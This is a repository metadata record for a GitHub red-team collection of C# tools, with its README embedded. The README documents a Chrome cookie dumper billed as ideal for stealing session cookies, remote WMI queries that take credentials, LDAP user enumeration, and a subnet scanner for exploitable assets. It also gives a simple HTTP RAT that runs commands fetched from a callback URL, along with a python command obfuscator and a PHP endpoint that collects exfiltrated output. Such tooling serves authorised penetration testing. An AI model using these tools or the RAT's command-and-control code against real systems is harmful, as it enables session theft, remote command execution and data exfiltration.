{"id":13840669,"url":"https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts","last_synced_at":"2025-07-11T09:32:43.290Z","repository":{"id":41517573,"uuid":"196319594","full_name":"Mr-Un1k0d3r/RedTeamCSharpScripts","owner":"Mr-Un1k0d3r","description":"C# Script used for Red Team","archived":false,"fork":false,"pushed_at":"2021-11-16T16:20:31.000Z","size":2768,"stargazers_count":712,"open_issues_count":0,"forks_count":139,"subscribers_count":22,"default_branch":"master","last_synced_at":"2024-08-05T17:25:30.222Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Mr-Un1k0d3r.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-07-11T04:26:40.000Z","updated_at":"2024-07-14T07:11:07.000Z","dependencies_parsed_at":"2022-09-21T11:41:41.153Z","dependency_job_id":null,"html_url":"https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-Un1k0d3r%2FRedTeamCSharpScripts","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-Un1k0d3r%2FRedTeamCSharpScripts/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-Un1k0d3r%2FRedTeamCSharpScripts/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-Un1k0d3r%2FRedTeamCSharpScripts/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Mr-Un1k0d3r","download_url":"https://codeload.github.com/Mr-Un1k0d3r/RedTeamCSharpScripts/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225712620,"owners_count":17512440,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:00:51.810Z","updated_at":"2024-11-21T10:30:36.527Z","avatar_url":"https://github.com/Mr-Un1k0d3r.png","language":"C#","readme":"# RedTeamCSharpScripts\nC# Script used for Red Team. These binaries can be used by Cobalt Strike execute-assembly or as standalone executable. \n\n\n# LDAP utility\n\nThe utility has been renamed to AdHuntTool and moved to its own repo [https://github.com/Mr-Un1k0d3r/ADHuntTool](https://github.com/Mr-Un1k0d3r/ADHuntTool)\n\n### The CheckManaged feature\n\nActive Directory support the following two attributes `managedobjects` and `managedby`. These attributes can be used to assign a manager to an object. It can be a user managing a computer. There is a GPO that can be used to grant local admin to managedobjects owner. The user will not be listed as a local admin by default by the correlation between `managedby` and `managedobjects` can identify users that managed computers.\n\nThe `CheckManaged` feature first confirm the presence of the GPO in question by looking at the SYSVOL policies present on the DC. If the `groups.xml` is present, it dump all the users with a `managedobjects` attribute and the computers with a `managedby` attribute.\n\n![managedexample](https://raw.githubusercontent.com/Mr-Un1k0d3r/RedTeamCSharpScripts/master/managed.png)\n\n# Web Hunter \n\nCSharp version of the Find-Fruit utility https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Find-Fruit.ps1. Tool to query network subnet looking for valuable assets that can be exploited. \n\n```\nwebhunter.exe 192.168.1.0/24 80,443,8080,8443\n```\n\n```\nwebhunter.exe 192.168.1.0/24 80,443,8080,8443 -verbose\n```\n\n# Cookies Monster\n\nFetch Chrome cookie in plaintext. Perfect to steal a target session cookie through execute-assembly\n\n```\nUsage: CookiesMonster.exe filter\n```\n\nThe filter argument is optional. If not specified it will dump all the cookies. Since the cookies are encrypted using ProtectedMemory Windows APIs you need to have access to the current user context to be able to generate the proper decryption key. \n\nThe binary need to be compiled statically to include the System.Data.SQLite dll.\n\n# WMI Utility\n\nSet of predefined WMI query that can be used to query CIM classes.\n\nThe utility support the following options\n\n```\nUsage: WMIUtility.exe options [arguments]\n\nListProcess         Return a list of running process\nListService         List all the services\nQuery               Args (query, columns) wmiutility.exe Query \"Select * From Win32_CommandLineAccess\" \"Name,Description\"\n\nListRemoteProcess   Return a list of running process on the target host\nListRemoteService   Return a list of all the services on the target host\nGet-EventForUser    Search for 4624 events targeting specific user\nRemoteQuery         Args (query, columns) \nGet-Av              Return a list of potential security product\n\nEX:\nwmiutility.exe ListRemoteProcess \u003cComputerName\u003e \u003cUsername\u003e \u003cPassword\u003e\nwmiutility.exe ListRemoteService \u003cComputerName\u003e \u003cUsername\u003e \u003cPassword\u003e\nwmiutility.exe Get-EventForUser \u003csamAccountname\u003e \u003cDomainController\u003e \u003cUsername\u003e \u003cPassword\u003e\nwmiutility.exe Get-EventForUser \u003csamAccountname\u003e all \u003cUsername\u003e \u003cPassword\u003e\nwmiutility.exe RemoteQuery \"Select * From Win32_CommandLineAccess\" \"Name,Description\" \u003cComputerName\u003e \u003cUsername\u003e \u003cPassword\u003e\n```\n\n# enumerateuser.cs\n\nList all the users samaccountname \u0026 mail\n\n```\nexecute-assembly C:\\enumerateuser.exe domain\n```\n\n# ldapquery.cs\n\nPerform custom ldap queries\n\n```\nexecute-assembly C:\\enumerateuser.exe ringzer0team \"(\u0026(objectCategory=User)(samaccountname=Mr.Un1k0d3r))\" samaccountname,mail\n\nQuerying LDAP://ringzer0team\nQuerying: (\u0026(objectCategory=User)(samaccountname=Mr.Un1k0d3r))\nExtracting: samaccountname,mail\nMr.Un1k0d3r,Mr.Un1k0d3r@corp.com,\n```\n\n# simple-http-rat.cs\n\nA simple RAT that execute command over HTTP. The code is calling back every 10 seconds and will execute the data present on the callback URL.\n\n`rat.exe callbackurl`\n\nThe data is obfuscated using the following python trick\n\n```\n$ python -c 'import base64; print base64.b64encode(\"cmd.exe /c whoami\")[::-1]'\n=kWbh9Ga3ByYvASZ4VmLk12Y\n```\n\nThe file creation can also be automated using the following script\n\n```\nimport base64\nimport sys\nimport os\n\npath = sys.argv[1]\ncmd = sys.argv[2]\n\nif os.path.exists(path):\n        os.remove(path)\n        \nopen(path, \"w+\").write(base64.b64encode(cmd)[::-1])\nprint \"Command added\"\n```\n\n```\nupdate.py /var/www/html/callback.html \"whoami\"\n```\n\nFor the post back RAT the following PHP code can be used to capture the data\n\n```\n\u003c?php\n$request = (object)array();\n\nif($_SERVER['REQUEST_METHOD'] === \"POST\") {\n        $request-\u003edata = file_get_contents(\"php://input\");\n        $request-\u003eip = $_SERVER[\"REMOTE_ADDR\"];\n        $request-\u003etime = date(\"r\");\n\n        $data = str_replace(\"!)(*\u0026#:\u003c]\", \"A\", $request-\u003edata);\n        $decoded = base64_decode($data);\n\n        file_put_contents(\"/tmp/output.txt\", \"[\" . $request-\u003etime . \"](\" . $request-\u003eip . \"): \" . $decoded . \"\\r\\n\", FILE_APPEND);\n} else {\n        echo file_get_contents(\"/tmp/payload.txt\");\n}\n?\u003e\n```\n\n# set.cs (set.exe)\n\nC# equivalent of Windows set command that does not required to spawn cmd.exe\n\n```\nexecute-assembly C:\\set.exe\n\nPROCESSOR_ARCHITEW6432=AMD64\nDriverData=C:\\Windows\\System32\\Drivers\\DriverData\n```\n\n# Credit\n\nMr.Un1k0d3r RingZer0 Team\n\nTazz0 RingZer0 Team\n\n# Contributors\n\n@theFlinkk for the AV module\n","funding_links":[],"categories":["C# (212)","C# #"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FMr-Un1k0d3r%2FRedTeamCSharpScripts","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FMr-Un1k0d3r%2FRedTeamCSharpScripts","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FMr-Un1k0d3r%2FRedTeamCSharpScripts/lists"}